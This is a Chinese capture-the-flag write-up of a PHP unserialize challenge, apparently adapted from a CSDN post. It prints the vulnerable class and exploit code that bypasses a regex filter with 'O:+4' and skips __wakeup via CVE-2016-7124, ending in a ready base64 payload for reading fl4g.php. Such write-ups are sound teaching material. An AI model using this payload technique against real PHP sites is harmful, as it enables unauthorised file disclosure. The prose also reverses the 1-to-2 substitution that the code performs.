本文借鑒 https://blog.csdn.net/qq_40884727/article/details/101162105
打開頁面得到源碼
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php $this->file = 'index.php'; } } } if (isset($_GET['var'])) { $var = base64_decode($_GET['var']); if (preg_match('/[oc]:\d+:/i', $var)) { die('stop hacking!'); } else { @unserialize($var); } } else { highlight_file("index.php"); } ?>
反序列化獲得fl4g里面的內容
借鑒別人的代碼,在本地運行一下就可以或者在線運行
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php $this->file = 'index.php'; } } } $A = new Demo('fl4g.php'); $b = serialize($A); //string(49) "O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}" $b = str_replace('O:4', 'O:+4',$b);//繞過preg_match $b = str_replace(':1:', ':2:',$b);//繞過wakeup //string(49) "O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}" echo (base64_encode($b));
//TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== ?>
用+4替換成4是為了繞過preg_match的正則表達式
同樣的把2替換成1是利用了CVE-2016-7124的漏洞,即當序列化字符串中表示對象屬性個數的值大於真實的屬性個數時會跳過__wakeup的執行
最后按照題目的意思encode一下base64就獲取反序列化的結果,get傳參即可
?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
獲得flag
